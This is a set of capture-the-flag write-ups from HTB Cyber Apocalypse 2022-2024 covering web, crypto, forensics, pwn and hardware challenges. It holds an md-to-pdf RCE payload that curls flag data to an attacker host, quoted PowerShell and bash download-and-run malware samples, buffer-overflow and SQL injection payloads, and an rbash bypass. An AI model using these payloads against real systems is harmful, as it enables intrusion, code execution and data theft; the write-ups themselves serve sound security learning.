We land on a dark page that seems to only have one functionality. We can upload an image when clicking somewhere in the center and it will modify it a bit.

![image](https://user-images.githubusercontent.com/80063008/169337150-b75a9828-5a31-41d7-bda0-d9b54b340b6c.png)

It seems to be using Pillow 8.4.0 according to the source code.

![image](https://user-images.githubusercontent.com/80063008/169337250-f7550c1f-32d9-472b-a1f2-365a561bcb36.png)

The code below is the one applied to the given picture.

![image](https://user-images.githubusercontent.com/80063008/169337375-a3f5feb5-8dd0-4151-a940-444f0a724a4b.png)

After some research we can find an interesting CVE that applies here, specifically CVE-2022-22817. `ImageMath.eval` allows arbitrary expressions, such as ones that use the Python `exec` function. From the code above, we can see that our injection point is in the Background.

![image](https://user-images.githubusercontent.com/80063008/169337604-ebba90d9-9514-4a86-8520-3de60a3c1b3c.png)

We could've used a payload to get RCE but in the interest of speed, we can just exfiltrate it using an HTTP request.

![image](https://user-images.githubusercontent.com/80063008/169337886-171cac90-aa9d-446f-bf76-a8d78ec8d014.png)

![image](https://user-images.githubusercontent.com/80063008/169337904-4fe7c745-5358-42de-a2ec-a259e6cf4400.png)

HTB{i_slept_my_way_to_rce}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2022/Web/BlinkerFluids.md:
--------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/169332230-ab4edbcc-702b-4cba-ad90-647268c4c04e.png)

We land on a page where we can create a PDF invoice.

![image](https://user-images.githubusercontent.com/80063008/169332707-6be56ec5-53fb-45f6-873c-cf8056c5e026.png)

Checking the provided source code, we notice how these PDFs are generated. They are using md-to-pdf, which is vulnerable to RCE.

![image](https://user-images.githubusercontent.com/80063008/169332943-38599176-89cf-443c-bbdc-65ced4e8fd74.png)

We can find the required payload here:
https://github.com/simonhaenisch/md-to-pdf/issues/99

```javascript
---js\n((require("child_process")).execSync(\"curl http://yourip/`cat /flag.txt|base64 -w0`\"))\n---RCE
```
![image](https://user-images.githubusercontent.com/80063008/169334413-3cc0dea8-d5d7-4294-854f-145ca10e4ff6.png)

And we get our flag.
![image](https://user-images.githubusercontent.com/80063008/169335540-3e7d420e-bebf-479a-bf8e-e76148c8d477.png)
![image](https://user-images.githubusercontent.com/80063008/169335045-a7298c78-d263-4e82-bb7d-461b5484ba5a.png)

HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Crypto/Ancient_Encodings.md:
--------------------------------------------------------------------------------
The first challenge in the Crypto section provides two files. The `output.txt` file contains the encoded data below:

```
0x53465243657a467558336b7764584a66616a4231636d347a655639354d48566664326b786246397a5a544e66644767784e56396c626d4d775a4446755a334e665a58597a636e6c33614756794d33303d
```

We are also provided with the `source.py` file below:

```python
from Crypto.Util.number import bytes_to_long
from base64 import b64encode

FLAG = b"HTB{??????????}"


def encode(message):
    return hex(bytes_to_long(b64encode(message)))


def main():
    encoded_flag = encode(FLAG)
    with open("output.txt", "w") as f:
        f.write(encoded_flag)


if __name__ == "__main__":
    main()
```

As we can see from the source code, the flag is base64 encoded and then hex encoded. No encryption here... phew.
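The same decode in Python, as an added example that is not the author's solution: the inverse of the `encode()` from `source.py`, written with `int.to_bytes` instead of pycryptodome, plus a loop that peels hex and base64 layers in turn, since these encodings are routinely stacked more than two deep. The `OUTPUT_TXT` value is the one from `output.txt` above.

```python
# Added example: undo hex(bytes_to_long(b64encode(flag))) and, more generally, peel
# stacked hex/base64 layers until plaintext appears. Uses the output.txt value from
# the challenge; not the author's one-liner.
import re
from base64 import b64decode, b64encode

OUTPUT_TXT = "0x53465243657a467558336b7764584a66616a4231636d347a655639354d48566664326b786246397a5a544e66644767784e56396c626d4d775a4446755a334e665a58597a636e6c33614756794d33303d"

HEX_RE = re.compile(r"^(?:0x)?[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def encode(message):
    """Same result as the challenge's encode(), without Crypto.Util.number."""
    return hex(int.from_bytes(b64encode(message), "big"))


def unhex_int(token):
    """Undo hex(bytes_to_long(x)). hex() drops a leading zero nibble, so the byte
    length is taken from the digit count, rounding up."""
    digits = token[2:] if token.startswith("0x") else token
    return int(digits, 16).to_bytes((len(digits) + 1) // 2, "big")


def peel(token, max_layers=8):
    """Strip hex and base64 layers in turn; returns (layer names, final bytes).
    Hex is tried first because a pure-hex string also satisfies the base64 alphabet."""
    layers, data = [], token.encode()
    for _ in range(max_layers):
        text = data.decode("ascii", errors="replace").strip()
        if "HTB{" in text:                      # reached the flag format, stop
            break
        if HEX_RE.match(text):
            data = unhex_int(text)
            layers.append("hex")
        elif B64_RE.match(text) and len(text) % 4 == 0:
            data = b64decode(text, validate=True)
            layers.append("base64")
        else:
            break                               # neither encoding: nothing more to peel
    return layers, data


if __name__ == "__main__":
    layers, flag = peel(OUTPUT_TXT)
    print(" -> ".join(layers), flag.decode())
```

Re-encoding the recovered bytes with `encode()` reproduces `output.txt` exactly, which is the cheap way to confirm nothing was lost at the `hex()` step.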

This means we can simply unhex and then base64 decode the flag with a one-liner:

```bash
xxd -r -p output.txt|base64 -d
```

And we get our flag:
![image](https://user-images.githubusercontent.com/80063008/227489718-208649c4-f7a1-47cf-a945-88b4990cd42f.png)

HTB{1n_y0ur_j0urn3y_y0u_wi1l_se3_th15_enc0d1ngs_ev3rywher3}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Crypto/Small_Steps.md:
--------------------------------------------------------------------------------
For the next challenge in the Crypto space, we can simply connect with netcat to the provided IP and port and we get an encrypted flag. The public key seems to have a small exponent.

![image](https://user-images.githubusercontent.com/80063008/227491185-410343e3-4f62-4d43-8f2e-0a229424274a.png)

This means we can use our good old friend, `RsaCtfTool.py`, which you can get from https://github.com/RsaCtfTool/RsaCtfTool. We can leave it running and it will eventually spit out the flag.

Please note that sagemath has to be installed for this attack to work. You can simply run `sudo dnf install sagemath;pip install -r optional-requirements.txt` from the RsaCtfTool directory. If you get errors about building gmpy, do `sudo apt install libgmp3-dev` and try again. If you get an error about the sage binary not being installed, make sure to get it from https://www.sagemath.org/download.html

```bash
RsaCtfTool.py -n 6561831657788149425694861301661479746323090591021707282323926588779254530106072593657744854168880717731602676903001378433383937484930939128266885943288847 -e 3 --uncipher 70407336670535933819674104208890254240063781538460394662998902860952366439176467447947737680952277637330523818962104685553250402512989897886053
```
Now you can go and have a coffee, take a break, or focus on a different challenge.
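What the tool is doing while you wait, as an added Python example (not the author's script or RsaCtfTool's code) using the n, e and c from the command above: with e = 3 and a short message, m^3 is smaller than n, so the ciphertext is a perfect cube over the integers and an integer cube root returns m directly. The loop over k covers the case where m^3 wrapped around n a few times (c + k*n is then a cube for some small k); when no small k works, the message was padded and this attack does not apply.

```python
# Added example: low-exponent RSA recovery (e = 3) for the Small Steps key. The
# values of N, E and C are the ones from the RsaCtfTool command in the writeup.

N = 6561831657788149425694861301661479746323090591021707282323926588779254530106072593657744854168880717731602676903001378433383937484930939128266885943288847
E = 3
C = 70407336670535933819674104208890254240063781538460394662998902860952366439176467447947737680952277637330523818962104685553250402512989897886053


def iroot(x, k):
    """Floor of the integer k-th root of x, by Newton's method on big ints."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + k - 1) // k)   # start at or above the true root
    while True:
        nr = ((k - 1) * r + x // r ** (k - 1)) // k
        if nr >= r:                              # stopped decreasing: r is the floor root
            return r
        r = nr


def small_e_recover(n, e, c, max_k=10_000):
    """Return (m, k) with m**e == c + k*n for the smallest k, or None if none is found.
    k == 0 is the textbook case where m**e never wrapped around n."""
    for k in range(max_k):
        candidate = c + k * n
        m = iroot(candidate, e)
        if m ** e == candidate:
            return m, k
    return None


def long_to_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def solve():
    """Recover the plaintext bytes for the challenge values."""
    found = small_e_recover(N, E, C)
    if found is None:
        raise ValueError("no small k gives a perfect cube; the message was probably padded")
    m, _ = found
    return long_to_bytes(m)


if __name__ == "__main__":
    print(solve())
```

The defence is padding, not a bigger key: with OAEP the padded message is as wide as n, so m^e always wraps around and there is no cube to take, whatever the exponent.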
After a while, we get our flag:

![image](https://user-images.githubusercontent.com/80063008/227500656-a3562617-ff7c-425f-b5ca-7611059cc57a.png)

HTB{5ma1l_E-xp0n3nt}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Forensics/Alien_Cradle.md:
--------------------------------------------------------------------------------
In Alien Cradle, the provided file is a PowerShell script:

![image](https://user-images.githubusercontent.com/80063008/227502377-d8b008b7-3114-41a6-b78d-79502e3f950e.png)

```powershell
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name -ne 'secret_HQ\Arth'){exit};$w = New-Object net.webclient;$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;$d = $w.DownloadString('http://windowsliveupdater.com/updates/33' + '96f3bf5a605cc4' + '1bd0d6e229148' + '2a5/2_34122.gzip.b64');$s = New-Object IO.MemoryStream(,[Convert]::FromBase64String($d));$f = 'H' + 'T' + 'B' + '{p0w3rs' + 'h3ll' + '_Cr4d' + 'l3s_c4n_g3t' + '_th' + '3_j0b_d' + '0n3}';IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
```

As we can see, the flag is broken up into a couple of pieces which we can easily put together to form:

HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Forensics/Extraterrestrial_Persistence.md:
--------------------------------------------------------------------------------
Extraterrestrial Persistence provides a bash script that looks like this:

![image](https://user-images.githubusercontent.com/80063008/227502771-bc5f9535-1bde-4abb-9474-86e40d46f647.png)

```bash
n=`whoami`
h=`hostname`
path='/usr/local/bin/service'
if [[ "$n" != "pandora" && "$h" != "linux_HQ" ]]; then exit; fi

curl https://files.pypi-install.com/packeges/service -o $path

chmod +x $path

echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service

systemctl enable service.service
```

Decoding the base64 string, we get to see what service was used for persistence and get the flag:

![image](https://user-images.githubusercontent.com/80063008/227503042-68422073-2e97-41e5-b881-45d2b1287a31.png)

HTB{th3s3_4l13nS_4r3_s00000_b4s1c}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Forensics/Plaintext_Tleasure.md:
--------------------------------------------------------------------------------
The first challenge in the Forensics category gives us a `capture.pcap` to analyse. Or... you know, we can just use `strings` and `grep`, the two golden tools/stars of any CTF.

![image](https://user-images.githubusercontent.com/80063008/227501415-c9ce49a0-7516-4294-b32b-6d329d1f8ffd.png)

HTB{th3s3_4l13ns_st1ll_us3_HTTP}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Hardware/Critical_Flight.md:
--------------------------------------------------------------------------------
For this challenge we received a bunch of `.gbr` files:

![image](https://user-images.githubusercontent.com/80063008/227531151-c28235a8-774b-4a41-b61b-ea053ab7b4b0.png)

Trying to read one, we notice a string mentioning the software that we would need:

![image](https://user-images.githubusercontent.com/80063008/227531277-882e003a-71b7-45b1-a52c-9d405e2f9481.png)

I installed the KiCad software, opened the first file and got part of the flag. Notice that there is no closing curly brace:

![image](https://user-images.githubusercontent.com/80063008/227531349-72f6eab4-46d8-4f6a-8e6e-716f4b708874.png)

The other part of the flag is in one of the other files:

![image](https://user-images.githubusercontent.com/80063008/227531460-f2573e03-f959-4e71-a836-ab9608c8e1f2.png)

HTB{533_7h3_1nn32_w02k1n95_0f_313c720n1c5#$@}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Hardware/Debug.md:
--------------------------------------------------------------------------------
Again we receive a .sal file, so we open it in Logic2.

![image](https://user-images.githubusercontent.com/80063008/227531894-ffb83a00-cfd9-457a-ad9a-ce6d5fa60fb0.png)

We go to Analyzers, apply Async Serial, select the channel with the data on it and apply a common baud rate of 115200. It just so happened to be the first thing I tried.

![image](https://user-images.githubusercontent.com/80063008/227532328-616239e2-fe83-49aa-8750-ab4174b26aa7.png)

On the right side of the menu, in the Data section, we click on the little icon for the Terminal and can see the flag split into pieces.

![image](https://user-images.githubusercontent.com/80063008/227532761-b7d12107-5a23-47aa-b809-c5c115fff6c8.png)

HTB{547311173_n37w02k_c0mp20m153d}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Hardware/Timed_Transmission.md:
--------------------------------------------------------------------------------
For this challenge, we receive a .sal file, which is a Saleae capture that can be opened in the Logic2 software:

![image](https://user-images.githubusercontent.com/80063008/227525327-34463318-2cde-4d00-832e-fc312fe5a092.png)

At first I tried to measure out the signal to figure out the baud rate but nothing came of it. Then I took a step back, or better said, zoomed in and then took a step back, and a picture started to form.

HTB
![image](https://user-images.githubusercontent.com/80063008/227530433-18f99208-657f-4ea8-a770-33c11b6fe1c1.png)

We can see HTB being formed by the signal channels themselves. Scrolling to the right we get more of the flag:

{b35
![image](https://user-images.githubusercontent.com/80063008/227530527-ad7998d1-0972-4ae2-aa5a-4212b2bb5bfe.png)

1N_t
![image](https://user-images.githubusercontent.com/80063008/227530608-7c1b9fb9-939c-4912-b52d-edf961a12b67.png)

And so on until we write down the entire flag:

HTB{b391N_tH3_HArdWAr3_QU3St}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/ML/Last_Hope.md:
--------------------------------------------------------------------------------
We receive a very interesting looking file with a `.qasm` extension.

![image](https://user-images.githubusercontent.com/80063008/227546021-906fb26b-5510-4dc4-ab0f-3518075cb857.png)

Reading it we see OPENQASM 2.0 being mentioned:

![image](https://user-images.githubusercontent.com/80063008/227546150-18e89cc0-7ed4-48cb-9394-c4c755532a91.png)

Some research later, we find we can open it using the `qiskit` Python library:

```bash
pip install qiskit
```

With ChatGPT's help, we reached this script:

```python
from qiskit import QuantumCircuit, Aer, execute

# Load the qasm file using the from_qasm_file() method
qasm_file = 'quantum_artifact.qasm'
qc = QuantumCircuit.from_qasm_file(qasm_file)

# Set up the simulator backend and execute the circuit
backend = Aer.get_backend('qasm_simulator')
job = execute(qc, backend, shots=1000)
result = job.result()

# Print the measurement counts
print(result.get_counts(qc))
```
The output of this script gives us a binary string:
![image](https://user-images.githubusercontent.com/80063008/227546843-41131e9c-5a89-4aae-b579-a87f17a0730a.png)

Decoded it in CyberChef to:

HTB{a_gl1mps3_0f_h0p3}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/ML/Reconfiguration.md:
--------------------------------------------------------------------------------
We have an analysis.ows file and a points.csv file. Reading the .ows file, we notice this section in it.

![image](https://user-images.githubusercontent.com/80063008/227541521-0fe7e7b2-dbb9-43f7-a64e-812d8cca8838.png)

Doing some Googling we can find the Orange software:

![image](https://user-images.githubusercontent.com/80063008/227541774-42f45fed-727c-4ece-af31-bc198384f50f.png)

We open these two files in the Orange software and connect the points to the Scatter Plot.

![image](https://user-images.githubusercontent.com/80063008/227542162-08fa45d3-e066-4525-963b-2d8dc43f4b83.png)

As soon as we do this, we get the flag. We just had to make sure that we expand the window to make the text more readable.

![image](https://user-images.githubusercontent.com/80063008/227541996-2f0b07d5-5901-426e-97b7-a10ce198d904.png)

HTB{sc4tter_pl0ts_4_th3_w1n}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Misc/Persistence.md:
--------------------------------------------------------------------------------
For this particular challenge, the description was very helpful:

"Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it's broken and usually returns random data, but keep trying, and you might get lucky... Legends say it works once every 1000 tries."

Just doing a curl request on the `/flag` endpoint of the provided IP and port, we get garbage:

![image](https://user-images.githubusercontent.com/80063008/227533457-d5150e3d-0144-4e98-a4b8-0ace111bd81c.png)

However, the description says it works once every 1000 tries, so let's do 1000 tries and see if we get the flag:

```bash
for i in {1..1000};do curl -s http://167.172.50.208:31200/flag|grep HTB;done
```

I added the `-s` flag for curl to be silent. After a short bit, we get the flag:

![image](https://user-images.githubusercontent.com/80063008/227535247-987f73a6-9e85-46de-ab70-d7d3f9c64ce6.png)

HTB{y0u_h4v3_p0w3rfuL_sCr1pt1ng_ab1lit13S!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Misc/Restricted.md:
--------------------------------------------------------------------------------
In this challenge we get a Docker container and, in the Dockerfile, we can see that an rbash shell is created for the user.

![image](https://user-images.githubusercontent.com/80063008/227537610-78c05960-ea45-42d2-9d19-588d39c84314.png)

We can bypass this when we SSH into the machine using `-t 'bash -noprofile'`:

```bash
ssh restricted@134.122.102.219 -p 31219 -t 'bash -noprofile'
```

This allows us to no longer be restricted, leave our home directory and read the flag:

![image](https://user-images.githubusercontent.com/80063008/227537791-cafce5e9-5b5a-4668-94b3-f4f7c0e234bd.png)

HTB{r35tr1ct10n5_4r3_p0w3r1355}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Pwn/Getting_Started.md:
--------------------------------------------------------------------------------
They provided a solver script directly:

```python
#!/usr/bin/python3.8

'''
You need to install pwntools to run the script.
To run the script: python3 ./wrapper.py
'''

# Library
from pwn import *

# Open connection
IP = '165.232.108.236' # Change this
PORT = 30356 # Change this

r = remote(IP, PORT)

# Craft payload
payload = b'A' * 50 # Change the number of "A"s

# Send payload
r.sendline(payload)

# Read flag
success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')
```
![image](https://user-images.githubusercontent.com/80063008/227555460-fcca80e5-39d2-4b63-978f-48bf52fb301e.png)

HTB{b0f_s33m5_3z_r1ght?}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Pwn/Initialise_Connection.md:
--------------------------------------------------------------------------------
This is the entire challenge:

![image](https://user-images.githubusercontent.com/80063008/227548195-89c880e3-045d-47a9-9045-c144e02c983c.png)

HTB{g3t_r34dy_f0r_s0m3_pwn}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Pwn/Labyrinth.md:
--------------------------------------------------------------------------------
Through experimentation we find that the buffer overflow happens at 56 characters. We see a function called `escape_plan` that opens and reads the flag, so we need to jump to that.

![image](https://user-images.githubusercontent.com/80063008/227556505-c3fb8ab8-6252-4712-8917-68d6be77269a.png)

The address can be found using gdb:

![image](https://user-images.githubusercontent.com/80063008/227556670-464f1ccd-7578-416c-88e2-b71f08b960a0.png)

However, jumping to that address only printed the ASCII artwork showing success but not the flag. I assumed the flag is printed after that so I moved to `0x401256` and got the flag.

My script to jump to the required function:

```python
#!/usr/bin/python3

from pwn import *

# io = process('./labyrinth')
io = remote('165.232.108.200', 32639)

io.recvuntil(b'>> ')
io.sendline(b'69')
io.recvuntil(b'>> ')

payload = b'A' * 56
payload += p64(0x401256)

io.sendline(payload)
io.interactive()
```

![image](https://user-images.githubusercontent.com/80063008/227555677-e7533c8b-193f-4f73-8049-6fcc11d10737.png)

HTB{3sc4p3_fr0m_4b0v3}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/README.md:
--------------------------------------------------------------------------------
I got to 270th out of 6483 teams, 36/74 solves... that's top 4.30%.
![image](https://user-images.githubusercontent.com/80063008/227562024-e3edea10-a0dd-43f6-b4f1-62edc1be566d.png)

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Reversing/Needle_in_a_haystack.md:
--------------------------------------------------------------------------------
This was easily solvable by running `strings` on the application and grepping for HTB:

![image](https://user-images.githubusercontent.com/80063008/227561821-357d2201-6d08-4955-9fd4-d58c05bd16d8.png)

HTB{d1v1ng_1nt0_th3_d4tab4nk5}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Reversing/Shattered_Tablet.md:
--------------------------------------------------------------------------------
For this challenge, I opened the provided binary in Ghidra and saw how the flag is printed. This is the order of the variables:

![image](https://user-images.githubusercontent.com/80063008/227557469-27867564-fd9f-420f-a346-cc4b0d8a7466.png)

We can see the character associated with each variable. We just need to put them in the right order: local_48 -> local_48_1_1 -> local_48_2_1 etc.

![image](https://user-images.githubusercontent.com/80063008/227557623-f3577982-0c6c-48e5-9f79-9b7c1b6a5202.png)

I did it manually and got the flag, but I'm sure there are easier ways:

HTB{br0k3n_4p4rt,n3ver_t0_b3_r3p41r3d}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Web/Drobots.md:
--------------------------------------------------------------------------------
We have a login screen:

![image](https://user-images.githubusercontent.com/80063008/227565559-a92252df-97d9-48dd-8c3f-f58b3658a5e0.png)

The first thing we try on a login screen is SQL injection.
I tried `' or 1=1-- -` but that didn't work, so let's try double quotes instead of single quotes: `" or 1=1-- -`

![image](https://user-images.githubusercontent.com/80063008/227565836-c9078718-9819-4987-a1cb-46eb644b2981.png)

HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Web/Gunhead.md:
--------------------------------------------------------------------------------
In the next challenge the main page looks like this:

![image](https://user-images.githubusercontent.com/80063008/227564667-86655478-7c9a-4339-b1d2-b638d44e6b99.png)

We see the icon of a terminal on the right side and if we click on it, we get the following menu:

![image](https://user-images.githubusercontent.com/80063008/227564816-c80127f9-66a9-4576-a2e1-1fb34dad20d8.png)

Trying command injection we get the flag:

![image](https://user-images.githubusercontent.com/80063008/227565246-dfbcbfad-c6b3-4e01-9f34-a71b632caf81.png)

HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2023/Web/Trapped_Source.md:
--------------------------------------------------------------------------------
For the first web challenge, we get a picture of a lock requesting a PIN:

![image](https://user-images.githubusercontent.com/80063008/227563989-a43e08ef-f4a1-48d4-8c5f-857584704bcf.png)

Reading the source code by pressing CTRL+U (or any other means), we see a PIN:

![image](https://user-images.githubusercontent.com/80063008/227564131-d8cc5930-219d-4e06-bf69-fe231eb314a7.png)

We get the flag after entering the correct PIN: 8291

![image](https://user-images.githubusercontent.com/80063008/227564289-08ce93a5-3d61-49ab-9628-ea2c7211e79c.png)

HTB{V13w_50urc3_c4n_b3_u53ful!!!}
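The Drobots flag above says it all: parameterization is important. As an added example (not code from the writeup or from the challenge), here is the bug and its fix side by side against a constructed in-memory SQLite table: a login query built by string formatting, next to the same query with bound parameters. The table, the users and the function names are this example's own; the same point applies to the KORP Terminal challenge later on this page, where a single quote in the username produced a SQL error. Note that the quote character in the payload simply has to match the one the vulnerable query uses (the constructed query below uses single quotes, where Drobots needed double quotes).

```python
"""Added example, not from the writeup: a string-built login query next to a
parameterised one, run against a constructed in-memory SQLite table."""
import sqlite3

# Constructed sample data.  Passwords are stored in clear text only to keep the
# demo short; a real application stores a salted hash and compares hashes.
USERS = [("admin", "Sup3rS3cretPa55"), ("alice", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username: str, password: str):
    """Splices user input straight into the SQL text.  A quote in the input
    closes the string literal and the rest of the input is parsed as SQL."""
    query = (
        f"SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, username: str, password: str):
    """Bound parameters: the driver sends the values separately from the
    query text, so quotes and comment markers are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the same payload through both versions and a legitimate login
    through the safe one.  Returns the matched username (or None) for each."""
    conn = make_db()
    # Same payload as in the writeup; here the vulnerable query uses single
    # quotes, so the single-quote form is the one that matches.
    payload = "' or 1=1-- -"
    return {
        "vulnerable": vulnerable_login(conn, payload, "anything"),  # 'admin'
        "safe": safe_login(conn, payload, "anything"),              # None
        "legit": safe_login(conn, "alice", "hunter2"),              # 'alice'
    }


if __name__ == "__main__":
    print(demo())
```

With the payload, the vulnerable query text becomes `... WHERE username='' or 1=1-- -' AND password='anything'`: the `or 1=1` makes the filter true for every row and `--` comments out the password check, so the first row (`admin`) comes back. The parameterised version looks for a user literally named `' or 1=1-- -` and finds nothing.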
--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Crypto/Makeshift.md:
--------------------------------------------------------------------------------
# Makeshift

## Solution
For this challenge, we get an output.txt and a source.py file.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/196697f0-7717-4d2f-9d9d-dbc261bb2504)

The output.txt contains:

```
!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB
```

And the source.py contains the Python code:

```python
from secret import FLAG

flag = FLAG[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)
```
No changes are required here really (reversing the string and then rotating each group of three characters is its own inverse, so running the same code on the output restores the flag):

```python
flag = '!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB'[::-1]
new_flag = ''

for i in range(0, len(flag), 3):
    new_flag += flag[i+1]
    new_flag += flag[i+2]
    new_flag += flag[i]

print(new_flag)
```
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/42068fd7-bf7d-4e08-8aac-2d2e856ba934)

`HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Forensics/It_Has_Begun.md:
--------------------------------------------------------------------------------
# It Has Begun

## Enumeration
The first, very easy forensics challenge provides a bash script:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d8d81baa-34e2-4e65-b225-dab9e13c71d2)

## Solution
Within it, we find the first part of the flag, but reversed:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8183fdf1-d7d0-4ad2-b903-8c35d40d012d)

No worries, we can reverse it back in the terminal using `rev`:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2da3e7c4-8dd5-442e-abb0-c5263c616426)

Further down in the script, we see a base64 string, so let's decode it:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4ceb0340-1cae-4a01-b73c-ee819887865a)

Now that we have the first and second parts of the flag, we put them together and submit:
`HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Hardware/BunnyPass.md:
--------------------------------------------------------------------------------
# BunnyPass

## Solution

As the description mentions, we are given access to a RabbitMQ instance with default credentials:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f5e2f810-cbfe-4063-94ab-afd246424236)

As can easily be found online, the default credentials for RabbitMQ are `guest:guest` and `admin:admin`. Both work in this instance but give the same level of access.

This takes a bit of enumeration, figuring out the interface if you are not familiar with it, and eventually we get the flag in one of the messages from the Queues.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/05dbb095-8ccd-4330-904e-2b0917173cf1)

From the `factory_idle` queue, you can read the 6th message and get the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3ac57d48-013c-4e2a-bfa5-d36446bfea2a)

`HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Misc/Character.md:
--------------------------------------------------------------------------------
# Character

## Solution

We connect to the given IP and port and it asks us for an index.
Starting from 0 and going past 100, we see that each index contains one letter of the flag.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3cb33ab4-3aac-4dd8-a480-ac05b0be67c1)

But there are too many to do manually:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e22c62a-ecd6-4e75-b5f1-8e25d5ed35e8)

So I scripted it:

```python
from pwn import *

r = remote('83.136.254.199', 30965)

print('H', end='')
r.recvuntil(b': ')
for i in range(104):
    r.sendline(str(i).encode())
    r.recvuntil(b': ')

    flag = r.recvline().decode().strip()[22:]
    flag = flag.replace(' ','')
    flag = flag.replace(':','')
    print(flag, flush=True, end='')
```
![flag](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a520ce6c-eb16-408a-b01b-a38ed8fea6bb)

`HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!}`

--------------------------------------------------------------------------------
/HTB - CyberApocalypse_2024/Misc/Stop_Drop_and_Roll.md:
--------------------------------------------------------------------------------
# Stop Drop and Roll

## Solution
When we connect to the provided IP and port, we are given instructions on how to complete the challenge:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0fa1df91-60f1-45b3-8599-717f8f6d1784)

We need to script something that will answer the challenge accordingly.
Here's my script that just replaces the words:

```python
from pwn import *
import warnings
warnings.filterwarnings('ignore')

r = remote('94.237.48.92', 37120)

r.recvuntil(b')')
r.sendline(b'y')
r.recvline()

while True:
    try:
        challenge = r.recvline().decode().strip()
        # Test each keyword on its own: `if 'FIRE' or 'ROLL' or ... in challenge`
        # is always true in Python, because the bare strings are truthy.
        if any(word in challenge for word in ('FIRE', 'PHREAK', 'GORGE')):
            answer = challenge.replace('FIRE','ROLL').replace('PHREAK','DROP').replace('GORGE','STOP').replace(', ','-')
